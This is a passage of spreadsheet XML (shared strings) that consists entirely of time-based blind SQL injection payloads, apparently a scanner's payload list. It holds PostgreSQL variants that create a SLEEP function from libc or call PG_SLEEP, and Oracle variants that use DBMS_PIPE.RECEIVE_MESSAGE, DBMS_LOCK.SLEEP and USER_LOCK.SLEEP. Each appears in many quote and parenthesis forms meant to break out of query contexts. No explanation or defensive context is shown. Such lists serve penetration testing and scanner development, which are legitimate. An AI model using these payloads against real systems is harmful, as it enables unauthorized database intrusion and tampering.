    <t xml:space="preserve">  )  )   ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (   ( 9773 = 9773</t>
  </si>
  <si>
    <t>; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;--</t>
  </si>
  <si>
    <t>' ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND  ( 'UExm' = 'UExm</t>
  </si>
  <si>
    <t>'  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (  'Ddhw' = 'Ddhw</t>
  </si>
  <si>
    <t>'  )  )   ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (   ( 'hkzy' = 'hkzy</t>
  </si>
  <si>
    <t>'; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND 'WPML' = 'WPML</t>
  </si>
  <si>
    <t>' ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND  ( 'SdSv' LIKE 'SdSv</t>
  </si>
  <si>
    <t>'  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (  'IVNy' LIKE 'IVNy</t>
  </si>
  <si>
    <t>'  )  )   ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (   ( 'NxaH' LIKE 'NxaH</t>
  </si>
  <si>
    <t>'; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND 'iFSs' LIKE 'iFSs</t>
  </si>
  <si>
    <t>" ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND  ( "TXMq" = "TXMq</t>
  </si>
  <si>
    <t>"  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (  "ompk" = "ompk</t>
  </si>
  <si>
    <t>"  )  )   ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (   ( "Rdyd" = "Rdyd</t>
  </si>
  <si>
    <t>"; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND "dmPj" = "dmPj</t>
  </si>
  <si>
    <t>" ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND  ( "KhRl" LIKE "KhRl</t>
  </si>
  <si>
    <t>"  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (  "IhRV" LIKE "IhRV</t>
  </si>
  <si>
    <t>"  )  )   ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (   ( "oMbY" LIKE "oMbY</t>
  </si>
  <si>
    <t>"; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND "Wxck" LIKE "Wxck</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;--</t>
  </si>
  <si>
    <t>' ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;--</t>
  </si>
  <si>
    <t>'; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;--</t>
  </si>
  <si>
    <t>"; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND  ( 8958 = 8958</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (  5480 = 5480</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (   ( 8585 = 8585</t>
  </si>
  <si>
    <t>; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;--</t>
  </si>
  <si>
    <t>' ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND  ( 'Clvn' = 'Clvn</t>
  </si>
  <si>
    <t>'  )  )  ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (  'abnI' = 'abnI</t>
  </si>
  <si>
    <t>'  )  )   ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (   ( 'RWYV' = 'RWYV</t>
  </si>
  <si>
    <t>'; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND 'YJPR' = 'YJPR</t>
  </si>
  <si>
    <t>' ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND  ( 'uvzX' LIKE 'uvzX</t>
  </si>
  <si>
    <t>'  )  )  ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (  'MuOg' LIKE 'MuOg</t>
  </si>
  <si>
    <t>'  )  )   ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (   ( 'LaWs' LIKE 'LaWs</t>
  </si>
  <si>
    <t>'; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND 'CBma' LIKE 'CBma</t>
  </si>
  <si>
    <t>" ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND  ( "uthz" = "uthz</t>
  </si>
  <si>
    <t>"  )  )  ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (  "yQDW" = "yQDW</t>
  </si>
  <si>
    <t>"  )  )   ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (   ( "tmDs" = "tmDs</t>
  </si>
  <si>
    <t>"; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND "ytUy" = "ytUy</t>
  </si>
  <si>
    <t>" ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND  ( "Xkcx" LIKE "Xkcx</t>
  </si>
  <si>
    <t>"  )  )  ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (  "hfla" LIKE "hfla</t>
  </si>
  <si>
    <t>"  )  )   ) ; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND   (  (   ( "mkfe" LIKE "mkfe</t>
  </si>
  <si>
    <t>"; SELECT DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 89 ) ||CHR ( 83 ) ||CHR ( 99 ) ||CHR ( 67 ) ,5 )  FROM DUAL;-- AND "dikY" LIKE "dikY</t>
  </si>
  <si>
    <t>'  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 'uuBp' = 'uuBp</t>
  </si>
  <si>
    <t>' ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND  ( 'jTsH' LIKE 'jTsH</t>
  </si>
  <si>
    <t>'  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  'aqRy' LIKE 'aqRy</t>
  </si>
  <si>
    <t>'  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 'dSWE' LIKE 'dSWE</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "CtTg" = "CtTg</t>
  </si>
  <si>
    <t>" ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND  ( "dynk" LIKE "dynk</t>
  </si>
  <si>
    <t>"  )  )  ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  "ZTFm" LIKE "ZTFm</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN DBMS_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "YlsI" LIKE "YlsI</t>
  </si>
  <si>
    <t>'  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 'UQtH' = 'UQtH</t>
  </si>
  <si>
    <t>' ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND  ( 'pTkG' LIKE 'pTkG</t>
  </si>
  <si>
    <t>'  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  'XLwy' LIKE 'XLwy</t>
  </si>
  <si>
    <t>'  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( 'OOwv' LIKE 'OOwv</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "pMix" = "pMix</t>
  </si>
  <si>
    <t>" ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND  ( "BfeF" LIKE "BfeF</t>
  </si>
  <si>
    <t>"  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  "tYsU" LIKE "tYsU</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "ILwH" LIKE "ILwH</t>
  </si>
  <si>
    <t>'  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  'xWkv' = 'xWkv</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (   ( 'VkOS' = 'VkOS</t>
  </si>
  <si>
    <t>' AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND 'yonq' = 'yonq</t>
  </si>
  <si>
    <t>' )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND  ( 'VNGW' LIKE 'VNGW</t>
  </si>
  <si>
    <t>'  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  'YXAW' LIKE 'YXAW</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (   ( 'NMeg' LIKE 'NMeg</t>
  </si>
  <si>
    <t>' AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND 'iTKz' LIKE 'iTKz</t>
  </si>
  <si>
    <t>" )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND  ( "tWks" = "tWks</t>
  </si>
  <si>
    <t>"  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  "qPTj" = "qPTj</t>
  </si>
  <si>
    <t>"  )  )   )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (   ( "VByX" = "VByX</t>
  </si>
  <si>
    <t>" AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND "pJsk" = "pJsk</t>
  </si>
  <si>
    <t>" )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND  ( "VzSM" LIKE "VzSM</t>
  </si>
  <si>
    <t>"  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  "HyfF" LIKE "HyfF</t>
  </si>
  <si>
    <t>"  )  )   )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (   ( "cUsn" LIKE "cUsn</t>
  </si>
  <si>
    <t>" AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND "LcvP" LIKE "LcvP</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND  ( 1800 = 1800</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (  9031 = 9031</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (   ( 9098 = 9098</t>
  </si>
  <si>
    <t>' )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND  ( 'PJtI' = 'PJtI</t>
  </si>
  <si>
    <t>'  )  )   AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (  'utOv' = 'utOv</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (   ( 'LdCk' = 'LdCk</t>
  </si>
  <si>
    <t>' AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND 'twMa' = 'twMa</t>
  </si>
  <si>
    <t>' )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND  ( 'yBBJ' LIKE 'yBBJ</t>
  </si>
  <si>
    <t>'  )  )   AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (  'BDsr' LIKE 'BDsr</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (   ( 'oSUM' LIKE 'oSUM</t>
  </si>
  <si>
    <t>' AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND 'IaaC' LIKE 'IaaC</t>
  </si>
  <si>
    <t>" )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND  ( "qOHw" = "qOHw</t>
  </si>
  <si>
    <t>"  )  )   AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (  "HynW" = "HynW</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (   ( "URLX" = "URLX</t>
  </si>
  <si>
    <t>" AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND "MWND" = "MWND</t>
  </si>
  <si>
    <t>" )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND  ( "zkNP" LIKE "zkNP</t>
  </si>
  <si>
    <t>"  )  )   AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (  "qESg" LIKE "qESg</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (   ( "vfWa" LIKE "vfWa</t>
  </si>
  <si>
    <t>" AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND "tzTI" LIKE "tzTI</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">' )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">' AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">" AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND  ( 6954 = 6954</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (  1196 = 1196</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (   ( 6513 = 6513</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 ) </t>
  </si>
  <si>
    <t>' )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND  ( 'hoxy' = 'hoxy</t>
  </si>
  <si>
    <t>'  )  )   AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (  'Bgxg' = 'Bgxg</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (   ( 'xsAP' = 'xsAP</t>
  </si>
  <si>
    <t>' AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND 'PVXq' = 'PVXq</t>
  </si>
  <si>
    <t>' )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND  ( 'cieD' LIKE 'cieD</t>
  </si>
  <si>
    <t>'  )  )   AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (  'eXfL' LIKE 'eXfL</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (   ( 'XNLQ' LIKE 'XNLQ</t>
  </si>
  <si>
    <t>' AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND 'ELzk' LIKE 'ELzk</t>
  </si>
  <si>
    <t>" )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND  ( "gvvk" = "gvvk</t>
  </si>
  <si>
    <t>"  )  )   AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (  "NJQM" = "NJQM</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (   ( "VeLb" = "VeLb</t>
  </si>
  <si>
    <t>" AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND "RyKC" = "RyKC</t>
  </si>
  <si>
    <t>" )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND  ( "aDMe" LIKE "aDMe</t>
  </si>
  <si>
    <t>"  )  )   AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (  "zITj" LIKE "zITj</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND   (  (   ( "odtK" LIKE "odtK</t>
  </si>
  <si>
    <t>" AND 4081 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 119 ) ||CHR ( 84 ) ||CHR ( 72 ) ,5 )  AND "hmJR" LIKE "hmJR</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) --</t>
  </si>
  <si>
    <t>' )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) --</t>
  </si>
  <si>
    <t>' AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) --</t>
  </si>
  <si>
    <t>" AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND  ( 1360 = 1360</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (  247 = 247</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (   ( 5085 = 5085</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) --</t>
  </si>
  <si>
    <t>' )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND  ( 'IFhJ' = 'IFhJ</t>
  </si>
  <si>
    <t>'  )  )   AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (  'rFHM' = 'rFHM</t>
  </si>
  <si>
    <t>'  )  )   )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (   ( 'YaZY' = 'YaZY</t>
  </si>
  <si>
    <t>' AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND 'foOB' = 'foOB</t>
  </si>
  <si>
    <t>' )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND  ( 'LANu' LIKE 'LANu</t>
  </si>
  <si>
    <t>'  )  )   AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (  'dDdL' LIKE 'dDdL</t>
  </si>
  <si>
    <t>'  )  )   )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (   ( 'fdYW' LIKE 'fdYW</t>
  </si>
  <si>
    <t>' AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND 'JmbR' LIKE 'JmbR</t>
  </si>
  <si>
    <t>" )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND  ( "CwAq" = "CwAq</t>
  </si>
  <si>
    <t>"  )  )   AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (  "otJq" = "otJq</t>
  </si>
  <si>
    <t>"  )  )   )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (   ( "KaIs" = "KaIs</t>
  </si>
  <si>
    <t>" AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND "MZZG" = "MZZG</t>
  </si>
  <si>
    <t>" )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND  ( "GLWB" LIKE "GLWB</t>
  </si>
  <si>
